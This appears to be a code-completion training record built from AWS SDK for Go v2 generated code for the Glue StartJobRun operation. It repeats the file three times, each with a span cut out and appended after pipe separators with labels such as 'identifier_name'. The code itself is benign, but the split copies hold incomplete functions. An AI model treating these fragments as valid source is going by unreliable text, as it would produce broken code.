// memory) with 256GB disk (approximately 235GB free), and provides 1 executor per
// worker. We recommend this worker type for jobs whose workloads contain your most
// demanding transforms, aggregations, joins, and queries. This worker type is
// available only for Glue version 3.0 or later Spark ETL jobs in the following
// Amazon Web Services Regions: US East (Ohio), US East (N. Virginia), US West
// (Oregon), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo),
// Canada (Central), Europe (Frankfurt), Europe (Ireland), and Europe (Stockholm).
// - For the G.8X worker type, each worker maps to 8 DPU (32 vCPUs, 128 GB of
// memory) with 512GB disk (approximately 487GB free), and provides 1 executor per
// worker. We recommend this worker type for jobs whose workloads contain your most
// demanding transforms, aggregations, joins, and queries. This worker type is
// available only for Glue version 3.0 or later Spark ETL jobs, in the same Amazon
// Web Services Regions as supported for the G.4X worker type.
// - For the G.025X worker type, each worker maps to 0.25 DPU (2 vCPUs, 4 GB of
// memory) with 84GB disk (approximately 34GB free), and provides 1 executor per
// worker. We recommend this worker type for low volume streaming jobs. This worker
// type is only available for Glue version 3.0 streaming jobs.
// - For the Z.2X worker type, each worker maps to 2 M-DPU (8vCPUs, 64 GB of
// memory) with 128 GB disk (approximately 120GB free), and provides up to 8 Ray
// workers based on the autoscaler.
WorkerType types.WorkerType
noSmithyDocumentSerde
}
type StartJobRunOutput struct {
// The ID assigned to this job run.
JobRunId *string
// Metadata pertaining to the operation's result.
ResultMetadata middleware.Metadata
noSmithyDocumentSerde
}
func (c *Client) addOperationStartJobRunMiddlewares(stack *middleware.Stack, options Options) (err error) {
err = stack.Serialize.Add(&awsAwsjson11_serializeOpStartJobRun{}, middleware.After)
if err != nil {
return err
}
err = stack.Deserialize.Add(&awsAwsjson11_deserializeOpStartJobRun{}, middleware.After)
if err != nil {
return err
}
if err = addlegacyEndpointContextSetter(stack, options); err != nil {
return err
}
if err = addSetLoggerMiddleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddClientRequestIDMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddComputeContentLengthMiddleware(stack); err != nil {
return err
}
if err = addResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = v4.AddComputePayloadSHA256Middleware(stack); err != nil {
return err
}
if err = addRetryMiddlewares(stack, options); err != nil {
return err
}
if err = addHTTPSignerV4Middleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddRawResponseToMetadata(stack); err != nil {
return err
}
if err = awsmiddleware.AddRecordResponseTiming(stack); err != nil {
return err
}
if err = addClientUserAgent(stack, options); err != nil {
return err
}
if err = smithyhttp.AddErrorCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = addStartJobRunResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = addOpStartJobRunValidationMiddleware(stack); err != nil {
return err
}
if err = stack.Initialize.Add(newServiceMetadataMiddleware_opStartJobRun(options.Region), middleware.Before); err != nil {
return err
}
if err = awsmiddleware.AddRecursionDetection(stack); err != nil {
return err
}
if err = addRequestIDRetrieverMiddleware(stack); err != nil {
return err
}
if err = addResponseErrorMiddleware(stack); err != nil {
return err
}
if err = addRequestResponseLogging(stack, options); err != nil {
return err
}
if err = addendpointDisableHTTPSMiddleware(stack, options); err != nil {
return err
}
return nil
}
func | (region string) *awsmiddleware.RegisterServiceMetadata {
return &awsmiddleware.RegisterServiceMetadata{
Region: region,
ServiceID: ServiceID,
SigningName: "glue",
OperationName: "StartJobRun",
}
}
type opStartJobRunResolveEndpointMiddleware struct {
EndpointResolver EndpointResolverV2
BuiltInResolver builtInParameterResolver
}
func (*opStartJobRunResolveEndpointMiddleware) ID() string {
return "ResolveEndpointV2"
}
func (m *opStartJobRunResolveEndpointMiddleware) HandleSerialize(ctx context.Context, in middleware.SerializeInput, next middleware.SerializeHandler) (
out middleware.SerializeOutput, metadata middleware.Metadata, err error,
) {
if awsmiddleware.GetRequiresLegacyEndpoints(ctx) {
return next.HandleSerialize(ctx, in)
}
req, ok := in.Request.(*smithyhttp.Request)
if !ok {
return out, metadata, fmt.Errorf("unknown transport type %T", in.Request)
}
if m.EndpointResolver == nil {
return out, metadata, fmt.Errorf("expected endpoint resolver to not be nil")
}
params := EndpointParameters{}
m.BuiltInResolver.ResolveBuiltIns(¶ms)
var resolvedEndpoint smithyendpoints.Endpoint
resolvedEndpoint, err = m.EndpointResolver.ResolveEndpoint(ctx, params)
if err != nil {
return out, metadata, fmt.Errorf("failed to resolve service endpoint, %w", err)
}
req.URL = &resolvedEndpoint.URI
for k := range resolvedEndpoint.Headers {
req.Header.Set(
k,
resolvedEndpoint.Headers.Get(k),
)
}
authSchemes, err := internalauth.GetAuthenticationSchemes(&resolvedEndpoint.Properties)
if err != nil {
var nfe *internalauth.NoAuthenticationSchemesFoundError
if errors.As(err, &nfe) {
// if no auth scheme is found, default to sigv4
signingName := "glue"
signingRegion := m.BuiltInResolver.(*builtInResolver).Region
ctx = awsmiddleware.SetSigningName(ctx, signingName)
ctx = awsmiddleware.SetSigningRegion(ctx, signingRegion)
}
var ue *internalauth.UnSupportedAuthenticationSchemeSpecifiedError
if errors.As(err, &ue) {
return out, metadata, fmt.Errorf(
"This operation requests signer version(s) %v but the client only supports %v",
ue.UnsupportedSchemes,
internalauth.SupportedSchemes,
)
}
}
for _, authScheme := range authSchemes {
switch authScheme.(type) {
case *internalauth.AuthenticationSchemeV4:
v4Scheme, _ := authScheme.(*internalauth.AuthenticationSchemeV4)
var signingName, signingRegion string
if v4Scheme.SigningName == nil {
signingName = "glue"
} else {
signingName = *v4Scheme.SigningName
}
if v4Scheme.SigningRegion == nil {
signingRegion = m.BuiltInResolver.(*builtInResolver).Region
} else {
signingRegion = *v4Scheme.SigningRegion
}
if v4Scheme.DisableDoubleEncoding != nil {
// The signer sets an equivalent value at client initialization time.
// Setting this context value will cause the signer to extract it
// and override the value set at client initialization time.
ctx = internalauth.SetDisableDoubleEncoding(ctx, *v4Scheme.DisableDoubleEncoding)
}
ctx = awsmiddleware.SetSigningName(ctx, signingName)
ctx = awsmiddleware.SetSigningRegion(ctx, signingRegion)
break
case *internalauth.AuthenticationSchemeV4A:
v4aScheme, _ := authScheme.(*internalauth.AuthenticationSchemeV4A)
if v4aScheme.SigningName == nil {
v4aScheme.SigningName = aws.String("glue")
}
if v4aScheme.DisableDoubleEncoding != nil {
// The signer sets an equivalent value at client initialization time.
// Setting this context value will cause the signer to extract it
// and override the value set at client initialization time.
ctx = internalauth.SetDisableDoubleEncoding(ctx, *v4aScheme.DisableDoubleEncoding)
}
ctx = awsmiddleware.SetSigningName(ctx, *v4aScheme.SigningName)
ctx = awsmiddleware.SetSigningRegion(ctx, v4aScheme.SigningRegionSet[0])
break
case *internalauth.AuthenticationSchemeNone:
break
}
}
return next.HandleSerialize(ctx, in)
}
func addStartJobRunResolveEndpointMiddleware(stack *middleware.Stack, options Options) error {
return stack.Serialize.Insert(&opStartJobRunResolveEndpointMiddleware{
EndpointResolver: options.EndpointResolverV2,
BuiltInResolver: &builtInResolver{
Region: options.Region,
UseDualStack: options.EndpointOptions.UseDualStackEndpoint,
UseFIPS: options.EndpointOptions.UseFIPSEndpoint,
Endpoint: options.BaseEndpoint,
},
}, "ResolveEndpoint", middleware.After)
}
| newServiceMetadataMiddleware_opStartJobRun | identifier_name |
api_op_StartJobRun.go | // Code generated by smithy-go-codegen DO NOT EDIT.
package glue
import (
"context"
"errors"
"fmt"
"github.com/aws/aws-sdk-go-v2/aws"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
internalauth "github.com/aws/aws-sdk-go-v2/internal/auth"
"github.com/aws/aws-sdk-go-v2/service/glue/types"
smithyendpoints "github.com/aws/smithy-go/endpoints"
"github.com/aws/smithy-go/middleware"
smithyhttp "github.com/aws/smithy-go/transport/http"
)
// Starts a job run using a job definition.
func (c *Client) StartJobRun(ctx context.Context, params *StartJobRunInput, optFns ...func(*Options)) (*StartJobRunOutput, error) {
if params == nil {
params = &StartJobRunInput{}
}
result, metadata, err := c.invokeOperation(ctx, "StartJobRun", params, optFns, c.addOperationStartJobRunMiddlewares)
if err != nil {
return nil, err
}
out := result.(*StartJobRunOutput)
out.ResultMetadata = metadata
return out, nil
}
type StartJobRunInput struct {
// The name of the job definition to use.
//
// This member is required.
JobName *string
// This field is deprecated. Use MaxCapacity instead. The number of Glue data
// processing units (DPUs) to allocate to this JobRun. You can allocate a minimum
// of 2 DPUs; the default is 10. A DPU is a relative measure of processing power
// that consists of 4 vCPUs of compute capacity and 16 GB of memory. For more
// information, see the Glue pricing page (https://aws.amazon.com/glue/pricing/) .
//
// Deprecated: This property is deprecated, use MaxCapacity instead.
AllocatedCapacity int32
// The job arguments associated with this run. For this job run, they replace the
// default arguments set in the job definition itself. You can specify arguments
// here that your own job-execution script consumes, as well as arguments that Glue
// itself consumes. Job arguments may be logged. Do not pass plaintext secrets as
// arguments. Retrieve secrets from a Glue Connection, Secrets Manager or other
// secret management mechanism if you intend to keep them within the Job. For
// information about how to specify and consume your own Job arguments, see the
// Calling Glue APIs in Python (https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-python-calling.html)
// topic in the developer guide. For information about the arguments you can
// provide to this field when configuring Spark jobs, see the Special Parameters
// Used by Glue (https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-etl-glue-arguments.html)
// topic in the developer guide. For information about the arguments you can
// provide to this field when configuring Ray jobs, see Using job parameters in
// Ray jobs (https://docs.aws.amazon.com/glue/latest/dg/author-job-ray-job-parameters.html)
// in the developer guide.
Arguments map[string]string
// Indicates whether the job is run with a standard or flexible execution class.
// The standard execution-class is ideal for time-sensitive workloads that require
// fast job startup and dedicated resources. The flexible execution class is
// appropriate for time-insensitive jobs whose start and completion times may vary.
// Only jobs with Glue version 3.0 and above and command type glueetl will be
// allowed to set ExecutionClass to FLEX . The flexible execution class is
// available for Spark jobs.
ExecutionClass types.ExecutionClass
// The ID of a previous JobRun to retry.
JobRunId *string
// For Glue version 1.0 or earlier jobs, using the standard worker type, the
// number of Glue data processing units (DPUs) that can be allocated when this job
// runs. A DPU is a relative measure of processing power that consists of 4 vCPUs
// of compute capacity and 16 GB of memory. For more information, see the Glue
// pricing page (https://aws.amazon.com/glue/pricing/) . For Glue version 2.0+
// jobs, you cannot specify a Maximum capacity . Instead, you should specify a
// Worker type and the Number of workers . Do not set MaxCapacity if using
// WorkerType and NumberOfWorkers . The value that can be allocated for MaxCapacity
// depends on whether you are running a Python shell job, an Apache Spark ETL job,
// or an Apache Spark streaming ETL job:
// - When you specify a Python shell job ( JobCommand.Name ="pythonshell"), you
// can allocate either 0.0625 or 1 DPU. The default is 0.0625 DPU.
// - When you specify an Apache Spark ETL job ( JobCommand.Name ="glueetl") or
// Apache Spark streaming ETL job ( JobCommand.Name ="gluestreaming"), you can
// allocate from 2 to 100 DPUs. The default is 10 DPUs. This job type cannot have a
// fractional DPU allocation.
MaxCapacity *float64
// Specifies configuration properties of a job run notification.
NotificationProperty *types.NotificationProperty
// The number of workers of a defined workerType that are allocated when a job
// runs.
NumberOfWorkers *int32
// The name of the SecurityConfiguration structure to be used with this job run.
SecurityConfiguration *string
// The JobRun timeout in minutes. This is the maximum time that a job run can
// consume resources before it is terminated and enters TIMEOUT status. This value
// overrides the timeout value set in the parent job. Streaming jobs do not have a
// timeout. The default for non-streaming jobs is 2,880 minutes (48 hours).
Timeout *int32
// The type of predefined worker that is allocated when a job runs. Accepts a
// value of G.1X, G.2X, G.4X, G.8X or G.025X for Spark jobs. Accepts the value Z.2X
// for Ray jobs.
// - For the G.1X worker type, each worker maps to 1 DPU (4 vCPUs, 16 GB of
// memory) with 84GB disk (approximately 34GB free), and provides 1 executor per
// worker. We recommend this worker type for workloads such as data transforms,
// joins, and queries, to offers a scalable and cost effective way to run most
// jobs.
// - For the G.2X worker type, each worker maps to 2 DPU (8 vCPUs, 32 GB of
// memory) with 128GB disk (approximately 77GB free), and provides 1 executor per
// worker. We recommend this worker type for workloads such as data transforms,
// joins, and queries, to offers a scalable and cost effective way to run most
// jobs.
// - For the G.4X worker type, each worker maps to 4 DPU (16 vCPUs, 64 GB of
// memory) with 256GB disk (approximately 235GB free), and provides 1 executor per
// worker. We recommend this worker type for jobs whose workloads contain your most
// demanding transforms, aggregations, joins, and queries. This worker type is
// available only for Glue version 3.0 or later Spark ETL jobs in the following
// Amazon Web Services Regions: US East (Ohio), US East (N. Virginia), US West
// (Oregon), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo),
// Canada (Central), Europe (Frankfurt), Europe (Ireland), and Europe (Stockholm).
// - For the G.8X worker type, each worker maps to 8 DPU (32 vCPUs, 128 GB of
// memory) with 512GB disk (approximately 487GB free), and provides 1 executor per
// worker. We recommend this worker type for jobs whose workloads contain your most
// demanding transforms, aggregations, joins, and queries. This worker type is
// available only for Glue version 3.0 or later Spark ETL jobs, in the same Amazon
// Web Services Regions as supported for the G.4X worker type.
// - For the G.025X worker type, each worker maps to 0.25 DPU (2 vCPUs, 4 GB of
// memory) with 84GB disk (approximately 34GB free), and provides 1 executor per
// worker. We recommend this worker type for low volume streaming jobs. This worker
// type is only available for Glue version 3.0 streaming jobs.
// - For the Z.2X worker type, each worker maps to 2 M-DPU (8vCPUs, 64 GB of
// memory) with 128 GB disk (approximately 120GB free), and provides up to 8 Ray
// workers based on the autoscaler.
WorkerType types.WorkerType
noSmithyDocumentSerde
}
type StartJobRunOutput struct {
// The ID assigned to this job run.
JobRunId *string
// Metadata pertaining to the operation's result.
ResultMetadata middleware.Metadata
noSmithyDocumentSerde
}
func (c *Client) addOperationStartJobRunMiddlewares(stack *middleware.Stack, options Options) (err error) {
err = stack.Serialize.Add(&awsAwsjson11_serializeOpStartJobRun{}, middleware.After)
if err != nil {
return err
}
err = stack.Deserialize.Add(&awsAwsjson11_deserializeOpStartJobRun{}, middleware.After)
if err != nil {
return err
}
if err = addlegacyEndpointContextSetter(stack, options); err != nil {
return err
}
if err = addSetLoggerMiddleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddClientRequestIDMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddComputeContentLengthMiddleware(stack); err != nil {
return err
}
if err = addResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = v4.AddComputePayloadSHA256Middleware(stack); err != nil {
return err
}
if err = addRetryMiddlewares(stack, options); err != nil {
return err
}
if err = addHTTPSignerV4Middleware(stack, options); err != nil |
if err = awsmiddleware.AddRawResponseToMetadata(stack); err != nil {
return err
}
if err = awsmiddleware.AddRecordResponseTiming(stack); err != nil {
return err
}
if err = addClientUserAgent(stack, options); err != nil {
return err
}
if err = smithyhttp.AddErrorCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = addStartJobRunResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = addOpStartJobRunValidationMiddleware(stack); err != nil {
return err
}
if err = stack.Initialize.Add(newServiceMetadataMiddleware_opStartJobRun(options.Region), middleware.Before); err != nil {
return err
}
if err = awsmiddleware.AddRecursionDetection(stack); err != nil {
return err
}
if err = addRequestIDRetrieverMiddleware(stack); err != nil {
return err
}
if err = addResponseErrorMiddleware(stack); err != nil {
return err
}
if err = addRequestResponseLogging(stack, options); err != nil {
return err
}
if err = addendpointDisableHTTPSMiddleware(stack, options); err != nil {
return err
}
return nil
}
func newServiceMetadataMiddleware_opStartJobRun(region string) *awsmiddleware.RegisterServiceMetadata {
return &awsmiddleware.RegisterServiceMetadata{
Region: region,
ServiceID: ServiceID,
SigningName: "glue",
OperationName: "StartJobRun",
}
}
type opStartJobRunResolveEndpointMiddleware struct {
EndpointResolver EndpointResolverV2
BuiltInResolver builtInParameterResolver
}
func (*opStartJobRunResolveEndpointMiddleware) ID() string {
return "ResolveEndpointV2"
}
func (m *opStartJobRunResolveEndpointMiddleware) HandleSerialize(ctx context.Context, in middleware.SerializeInput, next middleware.SerializeHandler) (
out middleware.SerializeOutput, metadata middleware.Metadata, err error,
) {
if awsmiddleware.GetRequiresLegacyEndpoints(ctx) {
return next.HandleSerialize(ctx, in)
}
req, ok := in.Request.(*smithyhttp.Request)
if !ok {
return out, metadata, fmt.Errorf("unknown transport type %T", in.Request)
}
if m.EndpointResolver == nil {
return out, metadata, fmt.Errorf("expected endpoint resolver to not be nil")
}
params := EndpointParameters{}
m.BuiltInResolver.ResolveBuiltIns(¶ms)
var resolvedEndpoint smithyendpoints.Endpoint
resolvedEndpoint, err = m.EndpointResolver.ResolveEndpoint(ctx, params)
if err != nil {
return out, metadata, fmt.Errorf("failed to resolve service endpoint, %w", err)
}
req.URL = &resolvedEndpoint.URI
for k := range resolvedEndpoint.Headers {
req.Header.Set(
k,
resolvedEndpoint.Headers.Get(k),
)
}
authSchemes, err := internalauth.GetAuthenticationSchemes(&resolvedEndpoint.Properties)
if err != nil {
var nfe *internalauth.NoAuthenticationSchemesFoundError
if errors.As(err, &nfe) {
// if no auth scheme is found, default to sigv4
signingName := "glue"
signingRegion := m.BuiltInResolver.(*builtInResolver).Region
ctx = awsmiddleware.SetSigningName(ctx, signingName)
ctx = awsmiddleware.SetSigningRegion(ctx, signingRegion)
}
var ue *internalauth.UnSupportedAuthenticationSchemeSpecifiedError
if errors.As(err, &ue) {
return out, metadata, fmt.Errorf(
"This operation requests signer version(s) %v but the client only supports %v",
ue.UnsupportedSchemes,
internalauth.SupportedSchemes,
)
}
}
for _, authScheme := range authSchemes {
switch authScheme.(type) {
case *internalauth.AuthenticationSchemeV4:
v4Scheme, _ := authScheme.(*internalauth.AuthenticationSchemeV4)
var signingName, signingRegion string
if v4Scheme.SigningName == nil {
signingName = "glue"
} else {
signingName = *v4Scheme.SigningName
}
if v4Scheme.SigningRegion == nil {
signingRegion = m.BuiltInResolver.(*builtInResolver).Region
} else {
signingRegion = *v4Scheme.SigningRegion
}
if v4Scheme.DisableDoubleEncoding != nil {
// The signer sets an equivalent value at client initialization time.
// Setting this context value will cause the signer to extract it
// and override the value set at client initialization time.
ctx = internalauth.SetDisableDoubleEncoding(ctx, *v4Scheme.DisableDoubleEncoding)
}
ctx = awsmiddleware.SetSigningName(ctx, signingName)
ctx = awsmiddleware.SetSigningRegion(ctx, signingRegion)
break
case *internalauth.AuthenticationSchemeV4A:
v4aScheme, _ := authScheme.(*internalauth.AuthenticationSchemeV4A)
if v4aScheme.SigningName == nil {
v4aScheme.SigningName = aws.String("glue")
}
if v4aScheme.DisableDoubleEncoding != nil {
// The signer sets an equivalent value at client initialization time.
// Setting this context value will cause the signer to extract it
// and override the value set at client initialization time.
ctx = internalauth.SetDisableDoubleEncoding(ctx, *v4aScheme.DisableDoubleEncoding)
}
ctx = awsmiddleware.SetSigningName(ctx, *v4aScheme.SigningName)
ctx = awsmiddleware.SetSigningRegion(ctx, v4aScheme.SigningRegionSet[0])
break
case *internalauth.AuthenticationSchemeNone:
break
}
}
return next.HandleSerialize(ctx, in)
}
func addStartJobRunResolveEndpointMiddleware(stack *middleware.Stack, options Options) error {
return stack.Serialize.Insert(&opStartJobRunResolveEndpointMiddleware{
EndpointResolver: options.EndpointResolverV2,
BuiltInResolver: &builtInResolver{
Region: options.Region,
UseDualStack: options.EndpointOptions.UseDualStackEndpoint,
UseFIPS: options.EndpointOptions.UseFIPSEndpoint,
Endpoint: options.BaseEndpoint,
},
}, "ResolveEndpoint", middleware.After)
}
| {
return err
} | conditional_block |
api_op_StartJobRun.go | // Code generated by smithy-go-codegen DO NOT EDIT.
package glue
import (
"context"
"errors"
"fmt"
"github.com/aws/aws-sdk-go-v2/aws"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
internalauth "github.com/aws/aws-sdk-go-v2/internal/auth"
"github.com/aws/aws-sdk-go-v2/service/glue/types"
smithyendpoints "github.com/aws/smithy-go/endpoints"
"github.com/aws/smithy-go/middleware"
smithyhttp "github.com/aws/smithy-go/transport/http"
)
// Starts a job run using a job definition.
func (c *Client) StartJobRun(ctx context.Context, params *StartJobRunInput, optFns ...func(*Options)) (*StartJobRunOutput, error) {
if params == nil {
params = &StartJobRunInput{}
}
result, metadata, err := c.invokeOperation(ctx, "StartJobRun", params, optFns, c.addOperationStartJobRunMiddlewares)
if err != nil {
return nil, err
}
out := result.(*StartJobRunOutput)
out.ResultMetadata = metadata
return out, nil
}
type StartJobRunInput struct {
// The name of the job definition to use.
//
// This member is required.
JobName *string
// This field is deprecated. Use MaxCapacity instead. The number of Glue data
// processing units (DPUs) to allocate to this JobRun. You can allocate a minimum
// of 2 DPUs; the default is 10. A DPU is a relative measure of processing power
// that consists of 4 vCPUs of compute capacity and 16 GB of memory. For more
// information, see the Glue pricing page (https://aws.amazon.com/glue/pricing/) .
//
// Deprecated: This property is deprecated, use MaxCapacity instead.
AllocatedCapacity int32
// The job arguments associated with this run. For this job run, they replace the
// default arguments set in the job definition itself. You can specify arguments
// here that your own job-execution script consumes, as well as arguments that Glue
// itself consumes. Job arguments may be logged. Do not pass plaintext secrets as
// arguments. Retrieve secrets from a Glue Connection, Secrets Manager or other
// secret management mechanism if you intend to keep them within the Job. For
// information about how to specify and consume your own Job arguments, see the
// Calling Glue APIs in Python (https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-python-calling.html)
// topic in the developer guide. For information about the arguments you can
// provide to this field when configuring Spark jobs, see the Special Parameters
// Used by Glue (https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-etl-glue-arguments.html)
// topic in the developer guide. For information about the arguments you can
// provide to this field when configuring Ray jobs, see Using job parameters in
// Ray jobs (https://docs.aws.amazon.com/glue/latest/dg/author-job-ray-job-parameters.html)
// in the developer guide.
Arguments map[string]string
// Indicates whether the job is run with a standard or flexible execution class.
// The standard execution-class is ideal for time-sensitive workloads that require
// fast job startup and dedicated resources. The flexible execution class is
// appropriate for time-insensitive jobs whose start and completion times may vary.
// Only jobs with Glue version 3.0 and above and command type glueetl will be
// allowed to set ExecutionClass to FLEX . The flexible execution class is
// available for Spark jobs.
ExecutionClass types.ExecutionClass
// The ID of a previous JobRun to retry.
JobRunId *string
// For Glue version 1.0 or earlier jobs, using the standard worker type, the
// number of Glue data processing units (DPUs) that can be allocated when this job
// runs. A DPU is a relative measure of processing power that consists of 4 vCPUs
// of compute capacity and 16 GB of memory. For more information, see the Glue
// pricing page (https://aws.amazon.com/glue/pricing/) . For Glue version 2.0+
// jobs, you cannot specify a Maximum capacity . Instead, you should specify a
// Worker type and the Number of workers . Do not set MaxCapacity if using
// WorkerType and NumberOfWorkers . The value that can be allocated for MaxCapacity
// depends on whether you are running a Python shell job, an Apache Spark ETL job,
// or an Apache Spark streaming ETL job:
// - When you specify a Python shell job ( JobCommand.Name ="pythonshell"), you
// can allocate either 0.0625 or 1 DPU. The default is 0.0625 DPU.
// - When you specify an Apache Spark ETL job ( JobCommand.Name ="glueetl") or
// Apache Spark streaming ETL job ( JobCommand.Name ="gluestreaming"), you can
// allocate from 2 to 100 DPUs. The default is 10 DPUs. This job type cannot have a
// fractional DPU allocation.
MaxCapacity *float64
// Specifies configuration properties of a job run notification.
NotificationProperty *types.NotificationProperty
// The number of workers of a defined workerType that are allocated when a job
// runs.
NumberOfWorkers *int32
// The name of the SecurityConfiguration structure to be used with this job run.
SecurityConfiguration *string
// The JobRun timeout in minutes. This is the maximum time that a job run can
// consume resources before it is terminated and enters TIMEOUT status. This value
// overrides the timeout value set in the parent job. Streaming jobs do not have a
// timeout. The default for non-streaming jobs is 2,880 minutes (48 hours).
Timeout *int32
// The type of predefined worker that is allocated when a job runs. Accepts a
// value of G.1X, G.2X, G.4X, G.8X or G.025X for Spark jobs. Accepts the value Z.2X
// for Ray jobs.
// - For the G.1X worker type, each worker maps to 1 DPU (4 vCPUs, 16 GB of
// memory) with 84GB disk (approximately 34GB free), and provides 1 executor per
// worker. We recommend this worker type for workloads such as data transforms,
// joins, and queries, to offers a scalable and cost effective way to run most
// jobs.
// - For the G.2X worker type, each worker maps to 2 DPU (8 vCPUs, 32 GB of
// memory) with 128GB disk (approximately 77GB free), and provides 1 executor per
// worker. We recommend this worker type for workloads such as data transforms,
// joins, and queries, to offers a scalable and cost effective way to run most
// jobs.
// - For the G.4X worker type, each worker maps to 4 DPU (16 vCPUs, 64 GB of
// memory) with 256GB disk (approximately 235GB free), and provides 1 executor per
// worker. We recommend this worker type for jobs whose workloads contain your most
// demanding transforms, aggregations, joins, and queries. This worker type is
// available only for Glue version 3.0 or later Spark ETL jobs in the following
// Amazon Web Services Regions: US East (Ohio), US East (N. Virginia), US West
// (Oregon), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo),
// Canada (Central), Europe (Frankfurt), Europe (Ireland), and Europe (Stockholm).
// - For the G.8X worker type, each worker maps to 8 DPU (32 vCPUs, 128 GB of
// memory) with 512GB disk (approximately 487GB free), and provides 1 executor per
// worker. We recommend this worker type for jobs whose workloads contain your most
// demanding transforms, aggregations, joins, and queries. This worker type is
// available only for Glue version 3.0 or later Spark ETL jobs, in the same Amazon
// Web Services Regions as supported for the G.4X worker type.
// - For the G.025X worker type, each worker maps to 0.25 DPU (2 vCPUs, 4 GB of
// memory) with 84GB disk (approximately 34GB free), and provides 1 executor per
// worker. We recommend this worker type for low volume streaming jobs. This worker
// type is only available for Glue version 3.0 streaming jobs.
// - For the Z.2X worker type, each worker maps to 2 M-DPU (8vCPUs, 64 GB of
// memory) with 128 GB disk (approximately 120GB free), and provides up to 8 Ray
// workers based on the autoscaler.
WorkerType types.WorkerType
noSmithyDocumentSerde
}
type StartJobRunOutput struct {
// The ID assigned to this job run.
JobRunId *string
// Metadata pertaining to the operation's result.
ResultMetadata middleware.Metadata
noSmithyDocumentSerde
}
func (c *Client) addOperationStartJobRunMiddlewares(stack *middleware.Stack, options Options) (err error) {
err = stack.Serialize.Add(&awsAwsjson11_serializeOpStartJobRun{}, middleware.After)
if err != nil {
return err
}
err = stack.Deserialize.Add(&awsAwsjson11_deserializeOpStartJobRun{}, middleware.After)
if err != nil {
return err
}
if err = addlegacyEndpointContextSetter(stack, options); err != nil {
return err
}
if err = addSetLoggerMiddleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddClientRequestIDMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddComputeContentLengthMiddleware(stack); err != nil {
return err
}
if err = addResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = v4.AddComputePayloadSHA256Middleware(stack); err != nil {
return err
}
if err = addRetryMiddlewares(stack, options); err != nil {
return err
}
if err = addHTTPSignerV4Middleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddRawResponseToMetadata(stack); err != nil {
return err
}
if err = awsmiddleware.AddRecordResponseTiming(stack); err != nil {
return err
}
if err = addClientUserAgent(stack, options); err != nil {
return err
}
if err = smithyhttp.AddErrorCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = addStartJobRunResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = addOpStartJobRunValidationMiddleware(stack); err != nil {
return err
}
if err = stack.Initialize.Add(newServiceMetadataMiddleware_opStartJobRun(options.Region), middleware.Before); err != nil {
return err
}
if err = awsmiddleware.AddRecursionDetection(stack); err != nil {
return err
}
if err = addRequestIDRetrieverMiddleware(stack); err != nil {
return err
}
if err = addResponseErrorMiddleware(stack); err != nil {
return err
}
if err = addRequestResponseLogging(stack, options); err != nil {
return err
}
if err = addendpointDisableHTTPSMiddleware(stack, options); err != nil {
return err
}
return nil
}
func newServiceMetadataMiddleware_opStartJobRun(region string) *awsmiddleware.RegisterServiceMetadata |
type opStartJobRunResolveEndpointMiddleware struct {
EndpointResolver EndpointResolverV2
BuiltInResolver builtInParameterResolver
}
func (*opStartJobRunResolveEndpointMiddleware) ID() string {
return "ResolveEndpointV2"
}
func (m *opStartJobRunResolveEndpointMiddleware) HandleSerialize(ctx context.Context, in middleware.SerializeInput, next middleware.SerializeHandler) (
out middleware.SerializeOutput, metadata middleware.Metadata, err error,
) {
if awsmiddleware.GetRequiresLegacyEndpoints(ctx) {
return next.HandleSerialize(ctx, in)
}
req, ok := in.Request.(*smithyhttp.Request)
if !ok {
return out, metadata, fmt.Errorf("unknown transport type %T", in.Request)
}
if m.EndpointResolver == nil {
return out, metadata, fmt.Errorf("expected endpoint resolver to not be nil")
}
params := EndpointParameters{}
m.BuiltInResolver.ResolveBuiltIns(¶ms)
var resolvedEndpoint smithyendpoints.Endpoint
resolvedEndpoint, err = m.EndpointResolver.ResolveEndpoint(ctx, params)
if err != nil {
return out, metadata, fmt.Errorf("failed to resolve service endpoint, %w", err)
}
req.URL = &resolvedEndpoint.URI
for k := range resolvedEndpoint.Headers {
req.Header.Set(
k,
resolvedEndpoint.Headers.Get(k),
)
}
authSchemes, err := internalauth.GetAuthenticationSchemes(&resolvedEndpoint.Properties)
if err != nil {
var nfe *internalauth.NoAuthenticationSchemesFoundError
if errors.As(err, &nfe) {
// if no auth scheme is found, default to sigv4
signingName := "glue"
signingRegion := m.BuiltInResolver.(*builtInResolver).Region
ctx = awsmiddleware.SetSigningName(ctx, signingName)
ctx = awsmiddleware.SetSigningRegion(ctx, signingRegion)
}
var ue *internalauth.UnSupportedAuthenticationSchemeSpecifiedError
if errors.As(err, &ue) {
return out, metadata, fmt.Errorf(
"This operation requests signer version(s) %v but the client only supports %v",
ue.UnsupportedSchemes,
internalauth.SupportedSchemes,
)
}
}
